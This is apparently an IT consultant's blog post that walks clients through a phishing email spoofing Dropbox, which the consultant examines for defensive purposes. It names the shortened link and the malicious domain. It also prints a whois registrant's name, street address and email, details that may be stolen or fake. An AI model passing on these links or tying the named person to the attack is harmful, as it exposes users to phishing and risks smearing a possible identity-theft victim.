There is a reason I send out regular security bulletins explicitly warning about malicious email activity and instructing you, my clients, to call me before you do anything that could have serious repercussions.  That is because there is really bad stuff out there!

I received a voice mail from a client saying she received an email from her accountant and it contained instructions for using Dropbox.  (Dropbox is a file hosting service that offers cloud storage and file synchronization.)  When I listened to the recording, I wasn’t sure if she couldn’t follow the instructions or if she couldn’t get Dropbox to open.  Needless to say, she sent the email to her son, and he couldn’t get it to work either.

Then she called her accountant, who told her he didn’t send it, but that other clients also received the email.  After all of that, she ended her message asking me if her computer was OK.

Well, that was a tough question to answer.  Just the same I was able to conduct some forensics into what occurred with this email – and it was most certainly malicious.

Here is the text of the problematic email (unfortunately I couldn’t capture the header information).

apr1

Now, I don’t know how many times I have told you not to click on links from people you don’t know, but that wasn’t the case here. This sender (whose name has been erased) is known to the recipient. However, I strongly doubt that any business person she knows uses arbitrary capitalization like this. I also doubt a professional would ever send an invoice labeled as a “doc” file with a “jpg” file type.

When you hover your mouse over the link, it shows http://ow.ly/ZZdSz. This is a form of URL (web address) shortening provided by the social site, HootSuite.

The resulting link resolves to the following page:

apr2

On the surface this looks like a sign-in page for Dropbox. However, if you look carefully in the address bar, you do not see the address for Dropbox. What you do see is a mile of gibberish, which alerted me to the fact that this web site was not legitimate. I also realize that the majority of people who use the Internet do not look in their browser’s address bar. With that mind, I plowed on.

I looked at the source code for this particular web page. And while the resulting HTML code isn’t anything I would expect you to understand, the most significant element is the repeated appearance of one Internet address that is used throughout. It is http://alllprotect.com, which is the source of this nonsense. Note that there are three “l”s in this name, which is not quite normal.

I ran the utility “whois” to find out information about this web site. The resulting page, from the web host GoDaddy, shows the following:

apr3

There may, in fact, be a person named Dominick LaGatta living at 7207 Sandy Isle Lane in Spring, Texas. But the phone number is a Carlsbad, California exchange. Yes, I know, some people move and take their cell phones with them. But most don’t use a Gmail address like this person did. After all, whirldcitizen@gmail.com strikes me as something a kid would do if he was trying to act “cool.”

This is obviously a web site that was registered to perform malicious activity and to hide the actual owner of the site.

Still, in the attempt to find out all I could, I logged on to the web page using the email address, fredflintstone@bedrock.com, with a password of “Barney.” That produced the following Symantec alert:

apr4

This alert says that the web site matches the signature of a known attack. This means that Symantec has already detected this site as having malicious intent.

Now, if you didn’t have Symantec protection (to simulate that I deliberately ignored the warning) the web site would have downloaded a Dropbox setup file. In my test case, Symantec quarantined it immediately, having recognized it as suspect. Again, if you didn’t have Symantec protection, this file would have downloaded.

There is no telling what this particular file could have done to your computer, your files, or your privacy if it was actually installed on your computer. As it stands, anyone who used their email address and regular password from any of the sites shown on the bogus web page now have compromised email accounts. And that is why you must always be on the lookout for fake emails.

While the only thing you can do – short of changing your email address – is to change your password, that may not be sufficient. The fact that someone responded to this web page means that particular email address is going to be a target for additional attempts for more malicious payloads in the future.

So I will repeat my warning: If you ever get any mail that you are unsure about, either delete it, or contact me so that I can review the contents and let you know if it is safe or garbage.

Any questions?

Leave a Reply

Your email address will not be published. Required fields are marked *

Post Navigation